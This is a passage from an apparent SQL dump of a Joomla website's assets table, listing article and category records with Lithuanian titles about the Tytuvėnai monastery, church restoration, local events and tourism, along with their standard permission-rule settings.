aukas',''),(324,157,467,468,3,'com_content.article.236','Tapybos darbų paroda','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(325,157,469,470,3,'com_content.article.237','Vasaros stovykla','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(194,157,351,352,3,'com_content.article.110','Konkursas vyr. finansininkės pareigoms užimti',''),(195,157,353,354,3,'com_content.article.111','Konkursas administratoriaus (-ės) pareigoms užimti','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(196,157,355,356,3,'com_content.article.112','Belaukiant Šv. Kalėdų',''),(198,157,357,358,3,'com_content.article.114','Tytuvėnų Bernardinų vienuolyno atstatymas',''),(199,157,359,360,3,'com_content.article.115','Pasaulinės turizmo dienos minėjimas Kelmės rajone',''),(200,157,361,362,3,'com_content.article.116','VISĄ GAVĖNIOS LAIKĄ KVIEČIAME GIEDOTI KALVARIJOS KALNŲ',''),(201,157,363,364,3,'com_content.article.117','Tytuvėnų Bernardinų vienuolyno stogas pradedamas dengti čerpėmis',''),(202,157,365,366,3,'com_content.article.118','Balandžio 26 d. 20 val. Programa iš ciklo KETURI PLIUS. PILMATIS',''),(203,157,367,368,3,'com_content.article.119','Atgimsta Birštono kurhauzas',''),(204,157,369,370,3,'com_content.article.120','Dainos ir ritmo spektaklis GAIDOS',''),(205,157,371,372,3,'com_content.article.121','Kviečiame į 1863 m. sukilimo minėjimą',''),(206,157,373,374,3,'com_content.article.122','Konkursas vyr. finansininko pareigoms eiti','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(207,157,375,376,3,'com_content.article.123','Pradedame prekiauti suvenyrais su Tytuvėnų simbolika',''),(208,157,377,378,3,'com_content.article.124','Tytuvėnų ansamblio bažnyčios stogo keitimo darbai įpusėjo',''),(209,157,379,380,3,'com_content.article.125','Europos paveldo dienos 2013 \"Epochų ženklai\"',''),(210,157,381,382,3,'com_content.article.126','Kvietimas į seminarą',''),(211,157,383,384,3,'com_content.article.127','Turizmo dienos paminėjimas',''),(212,157,385,386,3,'com_content.article.128','Konkursas mažiesiems ir jų tėveliams',''),(213,157,387,388,3,'com_content.article.129','Paminėta pasaulinė turizmo diena',''),(214,157,389,390,3,'com_content.article.130','Kviečiame į darbų saugos seminarą',''),(215,157,391,392,3,'com_content.article.131','Tęsiasi Tytuvėnų ansamblio atstatymo darbai',''),(216,157,393,394,3,'com_content.article.132','Tytuvėnų ansamblio bažnyčios stogo keitimo darbai',''),(217,157,395,396,3,'com_content.article.133','Kviečiame į renginį',''),(218,157,397,398,3,'com_content.article.134','Uždengtas Tytuvėnų bažnyčios pagrindinis stogas',''),(219,157,399,400,3,'com_content.article.135','Pasirašyta finansavimo sutartis dėl Tytuvėnų bažnyčios II etapo projekto vykdymo bei projekto rangos',''),(220,157,401,402,3,'com_content.article.136','Pildome vaikų svajones','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(221,157,403,404,3,'com_content.article.137','Kūčių vakarienė Tytuvėnų vienuolyne','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(222,157,405,406,3,'com_content.article.138','Tytuvėnų bažnyčios ir vienuolyno ansamblis','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(223,157,407,408,3,'com_content.article.139','Paroda \"Adventur 2014\"','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(224,157,409,410,3,'com_content.article.140','Kviečiame į 6-ąjį gimtadienį','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(225,158,266,267,4,'com_content.article.141','Newsflash 1',''),(226,158,268,269,4,'com_content.article.142','Newsflash 2',''),(227,158,270,271,4,'com_content.article.143','Newsflash 3',''),(228,158,272,273,4,'com_content.article.144','Newsflash 5',''),(229,158,274,275,4,'com_content.article.145','Newsflash 4',''),(230,159,280,281,4,'com_content.article.146','Tytuvėnų istorijos fragmentai',''),(231,159,282,283,4,'com_content.article.147','Is it useful to install the sample data?',''),(232,159,284,285,4,'com_content.article.148','How do I remove an Article?',''),(233,159,286,287,4,'com_content.article.149','What is the difference between Archiving and Trashing an Article?',''),(234,160,292,293,4,'com_content.article.150','Joomla! Facts',''),(235,160,294,295,4,'com_content.article.151','Piligrimai',''),(236,160,296,297,4,'com_content.article.152','The Joomla! Community',''),(237,161,302,303,4,'com_content.article.153','Šiaulų bažnytinio paveldo muziejus',''),(238,161,304,305,4,'com_content.article.154','Atidarytas Šiaulių vyskupijos bažnytinio paveldo muziejus',''),(239,164,316,317,4,'com_content.article.155','Kelmės regiono turizmo traukos objektas',''),(240,164,318,319,4,'com_content.article.156','How do I upgrade to Joomla! 1.5 ?',''),(241,164,320,321,4,'com_content.article.157','What happened to the locale setting?',''),(242,164,322,323,4,'com_content.article.158','Only one edit window! How do I create \"Read more...\"?',''),(243,164,324,325,4,'com_content.article.159','Tytuvėnų bernardinų vienuolynas',''),(244,164,326,327,4,'com_content.article.160','Where did the Installers go?',''),(245,164,328,329,4,'com_content.article.161','Where did the Mambots go?',''),(246,165,769,770,3,'com_content.article.162','How do I localise Joomla! to my language?',''),(247,165,771,772,3,'com_content.article.163','Ekskursijos',''),(248,165,773,774,3,'com_content.article.164','Apgyvendinimas','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(249,165,775,776,3,'com_content.article.165','What is the purpose of the collation selection in the installation screen?',''),(250,165,777,778,3,'com_content.article.166','What languages are supported by Joomla! 1.5?',''),(251,165,779,780,3,'com_content.article.167','Does the PDF icon render pictures and special characters?',''),(252,165,781,782,3,'com_content.article.168','I installed with my own language, but the Back-end is still in English',''),(253,165,783,784,3,'com_content.article.169','Edukacinė programa “Kalėdų gėlė“',''),(254,165,785,786,3,'com_content.article.170','Kelmės regiono turizmo traukos objektas',''),(255,165,787,788,3,'com_content.article.171','Edukacinė programa  „Žaliasparnio angelo gėlė“',''),(256,165,789,790,3,'com_content.article.172','Edukacinė programa „Su  maldos vėriniu per pasaulį“',''),(257,165,791,792,3,'com_content.article.173','Lankytini objektai','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(258,165,793,794,3,'com_content.article.174','Maitinimo įstaigos','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(259,165,795,796,3,'com_content.article.175','Turizmo informacija','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(260,166,751,752,3,'com_content.article.176','Įstatai','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(261,166,753,754,3,'com_content.article.177','Darbo užmokestis','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(262,166,755,756,3,'com_content.article.178','Paslaugos ir kainos','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(263,166,757,758,3,'com_content.article.179','Ekskursijos','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(264,166,759,760,3,'com_content.article.180','Suvenyrai','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(265,166,761,762,3,'com_content.article.181','Projektai',''),(266,166,763,764,3,'com_content.article.182','Veiklos strategija','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(267,166,765,766,3,'com_content.article.183','Edukacinės programos','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(269,144,237,238,3,'com_content.article.184','Parama','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(270,27,21,22,3,'com_content.article.185','Galerija','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(271,144,235,236,3,'com_content.article.186','Pasiūlymai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(272,144,243,244,3,'com_content.article.187','Muziejai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(273,27,23,24,3,'com_content.article.188','Gamtos paminklai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(274,8,820,837,2,'com_content.category.55','Tytuvėnų festivalis','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(275,274,821,830,3,'com_content.category.56','Naujienos','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(276,274,831,832,3,'com_content.article.189','Programos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(277,274,833,834,3,'com_content.article.190','Galerija','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(278,274,835,836,3,'com_content.article.191','Kontaktai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(279,157,411,412,3,'com_content.article.192','Koncertas fundacijos 400 metų progai paminėti','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(280,157,413,414,3,'com_content.article.193','Dviračių žygis 2014-06-07','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(281,165,797,798,3,'com_content.article.194','Kaimo turizmas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(282,165,799,800,3,'com_content.article.195','Aktyvus poilsis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(283,165,801,802,3,'com_content.article.196','Kulinarinis paveldas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(284,144,233,234,3,'com_content.article.197','Gido paslaugos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(285,165,803,804,3,'com_content.article.198','Suvenyrai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(286,165,805,806,3,'com_content.article.199','Turizmo maršrutai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(287,165,807,808,3,'com_content.article.200','Tytuvėnų regioninis parkas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(288,165,809,810,3,'com_content.article.201','Dubysos regioninis parkas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(289,165,811,812,3,'com_content.article.202','Kurtuvėnų regioninis parkas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(290,165,813,814,3,'com_content.article.203','Varnių regioninis parkas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(291,275,822,823,4,'com_content.article.204','XI Tarptautinis Tytuvėnų vasaros festivalis prasidėjo','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(292,157,415,416,3,'com_content.article.205','V. Kalvaičio 85-erių metų jubiliejaus minėjimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(293,144,231,232,3,'com_content.article.206','Galerija','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(294,157,417,418,3,'com_content.article.207','Renginys 400 metų jubiliejui paminėti','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(295,157,419,420,3,'com_content.article.208','Paminėtas 400 metų jubiliejus ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(296,157,421,422,3,'com_content.article.209','2014 m. europos paveldo dienos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(297,8,838,849,2,'com_content.category.57','Projektai','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(298,297,839,840,3,'com_content.article.210',' I etapas. Bažnyčios restauravimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(299,297,841,842,3,'com_content.article.211',' II etapas. Bažnyčios restauravimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(300,157,423,424,3,'com_content.article.212','Turizmo dienos renginiai Kelmės rajone','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(301,157,425,426,3,'com_content.article.213','Nemokamas koncertas \"DĖKINGUMAS\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(302,157,427,428,3,'com_content.article.214','Nuskambėjo paskutiniai muzikos akordai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(303,157,429,430,3,'com_content.article.215','Moliūgų fotografijos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(304,157,431,432,3,'com_content.article.216','Kaip teisingai valgyti?','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(305,157,433,434,3,'com_content.article.217','Edukacinė pamoka. KALĖDŲ ŽVAIGŽDĖ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(306,157,435,436,3,'com_content.article.218','Edukacinė  pamokėlė “Kalėdų žvaigždė\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(307,157,437,438,3,'com_content.article.219','Bažnyčios ir vienuolyno ateities planų aptarimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(308,157,439,440,3,'com_content.article.220','Sveikiname Šv. Kalėdų ir naujųjų metų proga.','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(309,157,441,442,3,'com_content.article.221','Žiemos pasaka','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(310,157,443,444,3,'com_content.article.222','ADVENTUR\'2015','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(311,157,445,446,3,'com_content.article.223','Kvietimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(312,157,447,448,3,'com_content.article.224',' Paminėtas Lietuvos valstybės gimtadienis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(313,157,449,450,3,'com_content.article.225','Užmiršta... užmiršta?','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(314,157,451,452,3,'com_content.article.226','Kvietimas  ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(315,157,453,454,3,'com_content.article.227','Poezijos skaitymai Tytuvėnuose','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(316,157,455,456,3,'com_content.article.228','Maldos pusryčiai Tytuvėnuose','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(317,157,457,458,3,'com_content.article.229','Tapybos paroda ir  \"Piligrimų gira\" pristatymas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(318,157,459,460,3,'com_content.article.230','Šv. Velykų sveikinimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(319,157,461,462,3,'com_content.article.231','Piligrimų gira','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(320,157,463,464,3,'com_content.article.232','Dėmesio aktyvaus poilsio mylėtojai!','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(327,157,473,474,3,'com_content.article.239','Tytuvėnų vasaros festivalis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(326,157,471,472,3,'com_content.article.238','Dviračių žygis ,,Tytuvėnai-2015’’','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(328,157,475,476,3,'com_content.article.240','Kryžių kalno atlaidai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(329,144,239,240,3,'com_content.article.241','Veiklos ataskaitos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(330,275,824,825,4,'com_content.article.242','Tytuvėnų vasaros festivalis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(331,275,826,827,4,'com_content.article.243','blank','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(332,157,477,478,3,'com_content.article.244','Sofijos Riomerienės tapybos paroda','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(333,157,479,480,3,'com_content.article.245','Sofijos Riomerienės tapybos darbų paroda','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(334,157,481,482,3,'com_content.article.246','Vilties ir padėkos žygis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(335,157,483,484,3,'com_content.article.247','2015-09-18 Europos paveldo dienos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(336,157,485,486,3,'com_content.article.248','Baigtas įgyvendinti projektas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(337,157,487,488,3,'com_content.article.249','\"Užkoduotas Tėvynės meilės ir ilgesio genas\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(338,157,489,490,3,'com_content.article.250','Renginiai nuo advento iki trijų karalių','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(339,157,491,492,3,'com_content.article.251','Paroda \"RAMYBĖS ŠYPSENA\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(340,157,493,494,3,'com_content.article.252','Paroda \"Iš R. E. Teresiūtės angelų kolekcijos\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(341,157,495,496,3,'com_content.article.253','Adventinis labdaros susitikimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(342,156,224,225,4,'com_content.article.254','Mažos vertės pirkimai 2014 m.','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(343,156,226,227,4,'com_content.article.255','Mažos vertės pirkimai 2015 m.','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(344,157,497,498,3,'com_content.article.256','ADVENTUR 2016','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(345,157,499,500,3,'com_content.article.257','Aplankykite mus 2016-aisiais','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(346,157,501,502,3,'com_content.article.258','Šiaulių dailės mokyklos mokinių darbų paroda','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(347,156,228,229,4,'com_content.article.259','Mažos vertės pirkimai 2016 m.','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(348,157,503,504,3,'com_content.article.260','Poezijos skaitymai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(349,157,505,506,3,'com_content.article.261','Edukacinė valanda - VERBA','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(350,157,507,508,3,'com_content.article.262','Laiko ženklai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(351,157,509,510,3,'com_content.article.263','Poezijos skaitymai Tytuvėnuose ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(352,157,511,512,3,'com_content.article.264','Didžioji savaitė','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(353,157,513,514,3,'com_content.article.265','Dievo Gailestingumo šventė','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(354,157,515,516,3,'com_content.article.266','50-mečio jubiliejus','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(355,157,517,518,3,'com_content.article.267','Ganytojiškas laiškas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(356,157,519,520,3,'com_content.article.268','Vienuolyno ansamblyje pražys rožių sodas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(357,157,521,522,3,'com_content.article.269','Tytuvėnų vasaros festivalis 2016','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(358,157,523,524,3,'com_content.article.270','Mediniai dovanų vokeliai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(359,157,525,526,3,'com_content.article.271','Rožių sodas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(360,1,907,908,1,'com_jalang','com_jalang','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(361,157,527,528,3,'com_content.article.272','Rožių sodo planas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(362,157,529,530,3,'com_content.article.273','Rask laiko sau','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(363,157,531,532,3,'com_content.article.274','Pasaulinė Turizmo Diena','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(364,157,533,534,3,'com_content.article.275','Skulptūros atidengimo šventė','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(365,157,535,536,3,'com_content.article.276','Šiaulių dailės mokyklos MENŲ VAKARAS','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(366,157,537,538,3,'com_content.article.277','Eglės Bičkienės grafikos darbų paroda','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(367,157,539,540,3,'com_content.article.278','Kalėdinis atvirukas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(368,157,541,542,3,'com_content.article.279','Fotografijų paroda','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(369,157,543,544,3,'com_content.article.280','Liturginė istorija \"Paskutinė vakarienė\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(370,157,545,546,3,'com_content.article.281','Sveikiname su Šv. Velykomis!','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(371,157,547,548,3,'com_content.article.282','Šventė \"Asiliuko pavasaris\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(372,157,549,550,3,'com_content.article.283','Paroda - I. Šliuželienės ir G. Kaltanienės darbai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(373,157,551,552,3,'com_content.article.284','Camino Lituano','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(374,157,553,554,3,'com_content.article.285','XIV Tytuvėnų vasaros festivalis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(375,275,828,829,4,'com_content.article.286','XIV Tytuvėnų vasaros festivalis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(376,157,555,556,3,'com_content.article.287','XIV Tytuvėnų vasaros festivalio atidarymas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(377,157,557,558,3,'com_content.article.288','Tytuvėnų aikštės atidarymas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(378,157,559,560,3,'com_content.article.289','Vargonų muzikos koncertai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(379,157,561,562,3,'com_content.article.290','Vargonų muzikos koncertai (2)','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(380,157,563,564,3,'com_content.article.291','Tytuvėnų aikštė...ir jos 